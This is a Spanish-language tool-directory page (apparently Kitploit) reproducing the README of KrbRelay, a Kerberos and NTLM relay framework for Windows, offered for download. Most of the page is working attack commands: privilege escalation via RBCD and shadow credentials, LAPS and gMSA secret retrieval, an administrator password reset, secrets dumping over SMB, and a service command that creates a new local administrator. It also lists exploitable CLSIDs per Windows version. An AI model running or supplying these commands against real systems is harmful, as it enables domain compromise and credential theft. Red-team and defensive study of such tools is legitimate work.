Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
KrbRelay — Marco de retransmisión de Kerberos para entornos Windows que permite la retransmisión de autenticación, escalada de privilegios y movimiento lateral a través de los protocolos LDAP, SMB, HTTP y RPC. | Kitploit
Herramientas/GitHubGitHub/cube0x0/krbrelay
Escalada de PrivilegiosExplotaciónMovimiento LateralAutenticaciónRed Teaming
GitHubcube0x0/krbrelay

KrbRelay

Marco de retransmisión de Kerberos para entornos Windows que permite la retransmisión de autenticación, escalada de privilegios y movimiento lateral a través de los protocolos LDAP, SMB, HTTP y RPC.

Ver Repositorio
953131hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

KrbRelay

Retransmitiendo perros de tres cabezas. Más detalles en https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html y https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html

Esto debería funcionar en la mayoría de los sistemas Windows completamente parcheados. Puede haber dificultades con sistemas operativos Server en entornos de laboratorio debido al firewall que bloquea el resolvedor OXID; sin embargo, esto probablemente no será un problema durante compromisos reales, al igual que con los CLSID.

image-20220213094644590

Protocolos y Características Compatibles

Algunos protocolos están más completos que otros, se aceptan PRs.

  • LLMNR

  • LDAP/LDAPS

  • HTTP

    • EWS
  • SMBv2

  • RPC sobre SMB

    • MS-SAMR
    • MS-SCMR
    • MS-RPRN
    • MS-RRP
    • MS-LSAT/MS-LSAD

Ejemplos

root@kitploit:~
# LPE
.\KrbRelay.exe -spn ldap/dc01.htb.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-2982218752-1219710089-3973213059-1606
.\KrbRelay.exe -spn ldap/dc01.htb.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred

# Cross-Session LDAP
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred win2016$
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -rbcd S-1-5-21-2982218752-1219710089-3973213059-1606 win2016$
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-groupmember srv_admins domain_user
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -laps
.\KrbRelay.exe -spn ldap/dc02.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ssl -gmsa
.\KrbRelay.exe -spn ldap/dc02.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ssl -reset-password administrator Password123!

# Cross-Session HTTP
.\KrbRelay.exe -spn http/exchange.htb.local -endpoint EWS/Exchange.asmx -ssl -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ews-search beta,test
.\KrbRelay.exe -spn http/exchange.htb.local -endpoint EWS/Exchange.asmx -ssl -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ews-delegate [email protected]
.\KrbRelay.exe -spn http/win2016.htb.local -endpoint iisstart.htm -proxy -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182

# Cross-Session SMB
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-privileges (([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value)
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -secrets 
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -service-add addUser "C:\windows\system32\cmd.exe /c """"C:\windows\system32\net user cube Password123! /add && C:\windows\system32\net localgroup administrators cube /add"""""

# LLMNR
.\KrbRelay.exe -llmnr -spn 'cifs/win2019.htb.local' -secrets

# NTLM (consulta https://github.com/antonioCoco/RemotePotato0 para CLSIDs)
.\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm
.\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm -downgrade

CheckPort.exe es una herramienta en C# que se puede usar para descubrir puertos disponibles para el resolvedor OXID.

root@kitploit:~
C:\Users\domain_user\Desktop\KrbRelay\CheckPort\bin\Release\CheckPort.exe
[*] Looking for available ports..
[*] Port: 1024 is available

CLSIDs

Necesitaremos deserializar nuestro OBJREF dentro de un proceso que permita autenticaciones a través de la red; esto se puede verificar observando el Nivel de suplantación (Impersonation Level)

  • RPC_C_IMP_LEVEL_DEFAULT # No funcionará
  • RPC_C_IMP_LEVEL_ANONYMOUS # No funcionará
  • RPC_C_IMP_LEVEL_IDENTIFY # Funciona para LDAP
  • RPC_C_IMP_LEVEL_IMPERSONATE # Requerido para SMB
  • RPC_C_IMP_LEVEL_DELEGATE

Al retransmitir a LDAP o a cualquier otro servicio que tenga la firma habilitada pero no impuesta, también necesitaremos verificar que el Nivel de autenticación (Authentication Level) del proceso esté configurado en RPC_C_AUTHN_LEVEL_CONNECT.

Los procesos que se ejecutan bajo NT Authority\Network service usarán la cuenta SYSTEM al autenticarse a través de la red.

Herramienta para descubrir CLSIDs: https://github.com/tyranid/oleviewdotnet

root@kitploit:~
Import-Module .\OleViewDotNet.psd1
Get-ComDatabase -SetCurrent
$comdb = Get-CurrentComDatabase
$clsids = (Get-ComClass).clsid
Get-ComProcess -DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | select ProcessId,ExecutablePath,Name,AppId,User,AuthnLevel,ImpLevel

Windows 10 1903

root@kitploit:~
# Retransmisión SYSTEM
0bae55fc-479f-45c2-972e-e951be72c0c1 # RPC_C_IMP_LEVEL_IDENTIFY
90f18417-f0f1-484e-9d3c-59dceee5dbd8 # RPC_C_IMP_LEVEL_IMPERSONATE 

# Retransmisión entre sesiones
0289a7c5-91bf-4547-81ae-fec91a89dec5 # RPC_C_IMP_LEVEL_IMPERSONATE 
1f87137d-0e7c-44d5-8c73-4effb68962f2 # RPC_C_IMP_LEVEL_IMPERSONATE 
73e709ea-5d93-4b2e-bbb0-99b7938da9e4 # RPC_C_IMP_LEVEL_IMPERSONATE 
9678f47f-2435-475c-b24a-4606f8161c16 # RPC_C_IMP_LEVEL_IMPERSONATE 
9acf41ed-d457-4cc1-941b-ab02c26e4686 # RPC_C_IMP_LEVEL_IMPERSONATE 
ce0e0be8-cf56-4577-9577-34cc96ac087c # RPC_C_IMP_LEVEL_IMPERSONATE 

Server 2019

root@kitploit:~
# Retransmisión SYSTEM
90f18417-f0f1-484e-9d3c-59dceee5dbd8 # RPC_C_IMP_LEVEL_IMPERSONATE

# Retransmisión entre sesiones
354ff91b-5e49-4bdc-a8e6-1cb6c6877182 # RPC_C_IMP_LEVEL_IMPERSONATE 
38e441fb-3d16-422f-8750-b2dacec5cefc # RPC_C_IMP_LEVEL_IMPERSONATE 
f8842f8e-dafe-4b37-9d38-4e0714a61149 # RPC_C_IMP_LEVEL_IMPERSONATE 

Server 2016

root@kitploit:~
# Retransmisión SYSTEM
90f18417-f0f1-484e-9d3c-59dceee5dbd8 # RPC_C_IMP_LEVEL_IMPERSONATE

# Retransmisión entre sesiones
0289a7c5-91bf-4547-81ae-fec91a89dec5 # RPC_C_IMP_LEVEL_IMPERSONATE
1f87137d-0e7c-44d5-8c73-4effb68962f2 # RPC_C_IMP_LEVEL_IMPERSONATE
5f7f3f7b-1177-4d4b-b1db-bc6f671b8f25 # RPC_C_IMP_LEVEL_IMPERSONATE
73e709ea-5d93-4b2e-bbb0-99b7938da9e4 # RPC_C_IMP_LEVEL_IMPERSONATE
9678f47f-2435-475c-b24a-4606f8161c16 # RPC_C_IMP_LEVEL_IMPERSONATE
98068995-54d2-4136-9bc9-6dbcb0a4683f # RPC_C_IMP_LEVEL_IMPERSONATE
9acf41ed-d457-4cc1-941b-ab02c26e4686 # RPC_C_IMP_LEVEL_IMPERSONATE
bdb57ff2-79b9-4205-9447-f5fe85f37312 # RPC_C_IMP_LEVEL_IMPERSONATE
ce0e0be8-cf56-4577-9577-34cc96ac087c # RPC_C_IMP_LEVEL_IMPERSONATE

Códigos de error

¿No funciona la primera vez? Inténtalo de nuevo y revisa estos códigos de error. Si vas a abrir un Issue, por favor pega la salida y entrada completa.

Firewall bloqueando el resolvedor OXID

root@kitploit:~
System.Runtime.InteropServices.COMException (0x800706BA): The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)

CLSID incorrecto

root@kitploit:~
System.Runtime.InteropServices.COMException (0x80080004): Bad path to object (Exception from HRESULT: 0x80080004 (CO_E_BAD_PATH))

o

root@kitploit:~
System.Runtime.InteropServices.COMException (0x80070422): The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. (Exception from HRESULT: 0x80070422)

Problemas de Kerberos (Tipo de autenticación no reconocido), funcionará después de reiniciar/sincronización de reloj

root@kitploit:~
System.Runtime.InteropServices.COMException (0x800706D3): The authentication service is unknown.

Un apReq válido comienza con 0x60, verifica tu entorno y parámetros

root@kitploit:~
[*] apReq: 05000b0710000000db003300020<SNIP>

Nivel de suplantación o nivel de autenticación del CLSID demasiado bajo

root@kitploit:~
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
System.UnauthorizedAccessException: Access is denied.

Access is denied.

Agradecimientos

  • Vletoux por iniciar RPCForSMBLibrary
  • James Forshaw por introducir la retransmisión Kerberos y NtApiDotNet
  • TalAloni por SMBLibrary
  • MichaelGrafnetter por DSInternals
  • Kevin Robertson por Inveigh
  • decoder_it y splinter_code por RemotePotato0
Descargar herramienta